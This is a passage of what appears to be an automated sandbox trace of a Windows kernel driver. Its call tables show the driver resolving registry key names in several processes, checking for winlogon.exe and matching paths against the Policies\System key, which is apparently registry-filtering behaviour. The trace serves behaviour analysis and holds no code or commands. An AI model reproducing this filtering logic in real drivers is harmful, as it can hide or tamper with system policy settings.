| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bf66080 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bf664d0 |
| _stricmp | _Str1 = iexplore.exe, _Str2 = winlogon.exe, ret_val_out = -14 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba3533f0, ret_val_out = 1 |
| ObQueryNameString | Object_ptr = 0xffffc000ba3533f0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002cf5afb8, ret_val_out = 0xc0000004 |
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x8a, ret_val_ptr_out = 0xffffe0003a77c910 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba3533f0, ret_val_out = 1 |
| ObQueryNameString | Object_ptr = 0xffffc000ba3533f0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002cf5ac98, ret_val_out = 0xc0000004 |
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x88, ret_val_ptr_out = 0xffffe0003a77c870 |
| ObQueryNameString | Object_ptr = 0xffffc000ba3533f0, Length = 0x88, ObjectNameInfo_unk_out = 0xffffe0003a77c870, ReturnLength_ptr_out = 0xffffd0002cf5ac98, ret_val_out = 0x0 |
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main |
| ExFreePoolWithTag | P_ptr = 0xffffe0003a77c870, Tag = 0x0 |
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 |
| ExFreePoolWithTag | P_ptr = 0xffffe0003a77c910, Tag = 0x0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bf66080 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bf664d0 |
| _stricmp | _Str1 = iexplore.exe, _Str2 = winlogon.exe, ret_val_out = -14 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bf66080 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bf664d0 |
| _stricmp | _Str1 = iexplore.exe, _Str2 = winlogon.exe, ret_val_out = -14 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bf66080 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bf664d0 |
| _stricmp | _Str1 = iexplore.exe, _Str2 = winlogon.exe, ret_val_out = -14 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bf66080 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bf664d0 |
| _stricmp | _Str1 = iexplore.exe, _Str2 = winlogon.exe, ret_val_out = -14 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bf66080 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bf664d0 |
| _stricmp | _Str1 = iexplore.exe, _Str2 = winlogon.exe, ret_val_out = -14 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bf66080 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bf664d0 |
| _stricmp | _Str1 = iexplore.exe, _Str2 = winlogon.exe, ret_val_out = -14 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b8dfbe40, ret_val_out = 1 |
| ObQueryNameString | Object_ptr = 0xffffc000b8dfbe40, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002cf5afb8, ret_val_out = 0xc0000004 |
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x7a, ret_val_ptr_out = 0xffffe0003c6341c0 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b8dfbe40, ret_val_out = 1 |
| ObQueryNameString | Object_ptr = 0xffffc000b8dfbe40, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002cf5ac98, ret_val_out = 0xc0000004 |
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x78, ret_val_ptr_out = 0xffffe0003a763520 |
| ObQueryNameString | Object_ptr = 0xffffc000b8dfbe40, Length = 0x78, ObjectNameInfo_unk_out = 0xffffe0003a763520, ReturnLength_ptr_out = 0xffffd0002cf5ac98, ret_val_out = 0x0 |
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\OLE\Extensions, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\OLE\Extensions |
| ExFreePoolWithTag | P_ptr = 0xffffe0003a763520, Tag = 0x0 |
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 |
| ExFreePoolWithTag | P_ptr = 0xffffe0003c6341c0, Tag = 0x0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bf66080 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bf664d0 |
| _stricmp | _Str1 = iexplore.exe, _Str2 = winlogon.exe, ret_val_out = -14 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bf66080 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bf664d0 |
| _stricmp | _Str1 = iexplore.exe, _Str2 = winlogon.exe, ret_val_out = -14 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bf66080 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bf664d0 |
| _stricmp | _Str1 = iexplore.exe, _Str2 = winlogon.exe, ret_val_out = -14 |
Execution Path #85 (length: 2, count: 1, processes: 1)
»
| Information | Value |
|---|---|
| Sequence Length | 2 |
Processes
»
| Process | Count |
|---|---|
| Process 25 (winlogon.exe, PID: 508) | 1 |
Sequence
»
| Symbol | Parameters |
|---|---|
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bc53300 |
| _stricmp | _Str1 = winlogon.exe, _Str2 = winlogon.exe, ret_val_out = 0 |
Execution Path #106 (length: 35, count: 2, processes: 1)
»
| Information | Value |
|---|---|
| Sequence Length | 35 |
Processes
»
| Process | Count |
|---|---|
| Process 42 (iexplore.exe, PID: 556) | 2 |
Sequence
»
| Symbol | Parameters |
|---|---|
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bf66080 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bf664d0 |
| _stricmp | _Str1 = iexplore.exe, _Str2 = winlogon.exe, ret_val_out = -14 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bf66080 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bf664d0 |
| _stricmp | _Str1 = iexplore.exe, _Str2 = winlogon.exe, ret_val_out = -14 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bf66080 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bf664d0 |
| _stricmp | _Str1 = iexplore.exe, _Str2 = winlogon.exe, ret_val_out = -14 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bf66080 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bf664d0 |
| _stricmp | _Str1 = iexplore.exe, _Str2 = winlogon.exe, ret_val_out = -14 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bf66080 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bf664d0 |
| _stricmp | _Str1 = iexplore.exe, _Str2 = winlogon.exe, ret_val_out = -14 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b8d16e80, ret_val_out = 1 |
| ObQueryNameString | Object_ptr = 0xffffc000b8d16e80, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00029c7fa38, ret_val_out = 0xc0000004 |
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x7a, ret_val_ptr_out = 0xffffe0003c6341c0 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b8d16e80, ret_val_out = 1 |
| ObQueryNameString | Object_ptr = 0xffffc000b8d16e80, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00029c7f718, ret_val_out = 0xc0000004 |
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x78, ret_val_ptr_out = 0xffffe0003a763520 |
| ObQueryNameString | Object_ptr = 0xffffc000b8d16e80, Length = 0x78, ObjectNameInfo_unk_out = 0xffffe0003a763520, ReturnLength_ptr_out = 0xffffd00029c7f718, ret_val_out = 0x0 |
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\OLE\Extensions, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\OLE\Extensions |
| ExFreePoolWithTag | P_ptr = 0xffffe0003a763520, Tag = 0x0 |
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 |
| ExFreePoolWithTag | P_ptr = 0xffffe0003c6341c0, Tag = 0x0 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bf66080 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bf664d0 |
| _stricmp | _Str1 = iexplore.exe, _Str2 = winlogon.exe, ret_val_out = -14 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bf66080 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bf664d0 |
| _stricmp | _Str1 = iexplore.exe, _Str2 = winlogon.exe, ret_val_out = -14 |
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bf66080 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bf664d0 |
| _stricmp | _Str1 = iexplore.exe, _Str2 = winlogon.exe, ret_val_out = -14 |
Execution Path #100 (length: 13, count: 2, processes: 2)
»
| Information | Value |
|---|---|
| Sequence Length | 13 |
Processes
»
| Process | Count |
|---|---|
| Process 36 (wmiadap.exe, PID: 3776) | 1 |
| Process 10 (svchost.exe, PID: 1000) | 1 |
Sequence
»
| Symbol | Parameters |
|---|---|
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c367080 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3674d0 |
| _stricmp | _Str1 = WMIADAP.exe, _Str2 = winlogon.exe, ret_val_out = 4 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b8d16e80, ret_val_out = 1 |
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x72, ret_val_ptr_out = 0xffffe0003c6341c0 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b8d16e80, ret_val_out = 1 |
| ObQueryNameString | Object_ptr = 0xffffc000b8d16e80, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd00029867c98, ret_val_out = 0xc0000004 |
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x70, ret_val_ptr_out = 0xffffe0003c634270 |
| ObQueryNameString | Object_ptr = 0xffffc000b8d16e80, Length = 0x70, ObjectNameInfo_unk_out = 0xffffe0003c634270, ReturnLength_ptr_out = 0xffffd00029867c98, ret_val_out = 0x0 |
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM |
| ExFreePoolWithTag | P_ptr = 0xffffe0003c634270, Tag = 0x0 |
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 |
| ExFreePoolWithTag | P_ptr = 0xffffe0003c6341c0, Tag = 0x0 |
Execution Path #150 (length: 10, count: 3, processes: 2)
»
| Information | Value |
|---|---|
| Sequence Length | 10 |
Processes
»
| Process | Count |
|---|---|
| Process 7 (svchost.exe, PID: 888) | 2 |
| Process 107 (msfeedssync.exe, PID: 4172) | 1 |
Sequence
»
| Symbol | Parameters |
|---|---|
| ObQueryNameString | Object_ptr = 0xffffc000b9be2800, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002b8bafb8, ret_val_out = 0xc0000004 |
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x116, ret_val_ptr_out = 0xffffe0003a7879d0 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b9be2800, ret_val_out = 1 |
| ObQueryNameString | Object_ptr = 0xffffc000b9be2800, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002b8bac98, ret_val_out = 0xc0000004 |
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x114, ret_val_ptr_out = 0xffffe0003a769ee0 |
| ObQueryNameString | Object_ptr = 0xffffc000b9be2800, Length = 0x114, ObjectNameInfo_unk_out = 0xffffe0003a769ee0, ReturnLength_ptr_out = 0xffffd0002b8bac98, ret_val_out = 0x0 |
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Diagnostics-Performance/Operational, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Diagnostics-Performance/Operational |
| ExFreePoolWithTag | P_ptr = 0xffffe0003a769ee0, Tag = 0x0 |
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 |
| ExFreePoolWithTag | P_ptr = 0xffffe0003a7879d0, Tag = 0x0 |
Execution Path #151 (length: 11, count: 125, processes: 2)
»
| Information | Value |
|---|---|
| Sequence Length | 11 |
Processes
»
| Process | Count |
|---|---|
| Process 7 (svchost.exe, PID: 888) | 62 |
| Process 107 (msfeedssync.exe, PID: 4172) | 63 |
Sequence
»
| Symbol | Parameters |
|---|---|
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b8d4f800, ret_val_out = 1 |
| ObQueryNameString | Object_ptr = 0xffffc000b8d4f800, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002b8bafb8, ret_val_out = 0xc0000004 |
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x114, ret_val_ptr_out = 0xffffe0003a7879d0 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b8d4f800, ret_val_out = 1 |
| ObQueryNameString | Object_ptr = 0xffffc000b8d4f800, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002b8bac98, ret_val_out = 0xc0000004 |
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x112, ret_val_ptr_out = 0xffffe0003a769ee0 |
| ObQueryNameString | Object_ptr = 0xffffc000b8d4f800, Length = 0x112, ObjectNameInfo_unk_out = 0xffffe0003a769ee0, ReturnLength_ptr_out = 0xffffd0002b8bac98, ret_val_out = 0x0 |
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Diagnostics-Performance/Diagnostic, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Diagnostics-Performance/Diagnostic |
| ExFreePoolWithTag | P_ptr = 0xffffe0003a769ee0, Tag = 0x0 |
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 |
| ExFreePoolWithTag | P_ptr = 0xffffe0003a7879d0, Tag = 0x0 |
Execution Path #159 (length: 2, count: 1, processes: 1)
»
| Information | Value |
|---|---|
| Sequence Length | 2 |
Processes
»
| Process | Count |
|---|---|
| Process 28 (sihost.exe, PID: 1432) | 1 |
Sequence
»
| Symbol | Parameters |
|---|---|
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bf6f840 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bf6fc90 |
Execution Path #165 (length: 4324, count: 1, processes: 1)
»
| Information | Value |
|---|---|
| Sequence Length | 4324 |
Processes
»
| Process | Count |
|---|---|
| Process 107 (msfeedssync.exe, PID: 4172) | 1 |
Sequence
»
| Symbol | Parameters | ||||
|---|---|---|---|---|---|
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b90b9460, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b90b9460, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002f60ffb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x106, ret_val_ptr_out = 0xffffe0003a7664d0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b90b9460, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b90b9460, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002f60fc98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x104, ret_val_ptr_out = 0xffffe0003a769010 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b90b9460, Length = 0x104, ObjectNameInfo_unk_out = 0xffffe0003a769010, ReturnLength_ptr_out = 0xffffd0002f60fc98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\USER\S-1-5-21-1560258661-3990802383-1811730007-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings, DestinationString_out = \REGISTRY\USER\S-1-5-21-1560258661-3990802383-1811730007-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003a769010, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\USER\, ret_val_out = 0 | ||||
| _wcsicmp | _String1 = \SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings, _String2 = \Software\Microsoft\Windows\CurrentVersion\Policies\System, ret_val_out = -7 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003a7664d0, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b90b9460, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b90b9460, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002f60ffb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x106, ret_val_ptr_out = 0xffffe0003a7664d0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b90b9460, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b90b9460, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002f60fc98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x104, ret_val_ptr_out = 0xffffe0003a769010 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b90b9460, Length = 0x104, ObjectNameInfo_unk_out = 0xffffe0003a769010, ReturnLength_ptr_out = 0xffffd0002f60fc98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\USER\S-1-5-21-1560258661-3990802383-1811730007-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings, DestinationString_out = \REGISTRY\USER\S-1-5-21-1560258661-3990802383-1811730007-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003a769010, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\USER\, ret_val_out = 0 | ||||
| _wcsicmp | _String1 = \SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings, _String2 = \Software\Microsoft\Windows\CurrentVersion\Policies\System, ret_val_out = -7 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003a7664d0, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b99fd650, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b99fd650, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002f60ffb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xae, ret_val_ptr_out = 0xffffe0003af7df50 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b99fd650, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b99fd650, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002f60fc98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xac, ret_val_ptr_out = 0xffffe0003af7de90 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b99fd650, Length = 0xac, ObjectNameInfo_unk_out = 0xffffe0003af7de90, ReturnLength_ptr_out = 0xffffd0002f60fc98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af7de90, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af7df50, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b90b9460, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b90b9460, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002f60ffb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x106, ret_val_ptr_out = 0xffffe0003a7664d0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b90b9460, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b90b9460, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002f60fc98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x104, ret_val_ptr_out = 0xffffe0003a769010 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b90b9460, Length = 0x104, ObjectNameInfo_unk_out = 0xffffe0003a769010, ReturnLength_ptr_out = 0xffffd0002f60fc98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\USER\S-1-5-21-1560258661-3990802383-1811730007-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings, DestinationString_out = \REGISTRY\USER\S-1-5-21-1560258661-3990802383-1811730007-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003a769010, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\USER\, ret_val_out = 0 | ||||
| _wcsicmp | _String1 = \SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings, _String2 = \Software\Microsoft\Windows\CurrentVersion\Policies\System, ret_val_out = -7 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003a7664d0, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b99fd650, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b99fd650, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002f60ffb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xae, ret_val_ptr_out = 0xffffe0003af7df50 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b99fd650, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b99fd650, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002f60fc98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xac, ret_val_ptr_out = 0xffffe0003af7de90 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b99fd650, Length = 0xac, ObjectNameInfo_unk_out = 0xffffe0003af7de90, ReturnLength_ptr_out = 0xffffd0002f60fc98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af7de90, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af7df50, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003c3ce740 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003c3ceb90 | ||||
| _stricmp | _Str1 = msfeedssync.ex, _Str2 = winlogon.exe, ret_val_out = -10 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b99fd650, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b99fd650, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002f60ffb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xae, ret_val_ptr_out = 0xffffe0003af7df50 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b99fd650, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b99fd650, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002f60fc98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xac, ret_val_ptr_out = 0xffffe0003af7de90 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b99fd650, Length = 0xac, ObjectNameInfo_unk_out = 0xffffe0003af7de90, ReturnLength_ptr_out = 0xffffd0002f60fc98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings | ||||
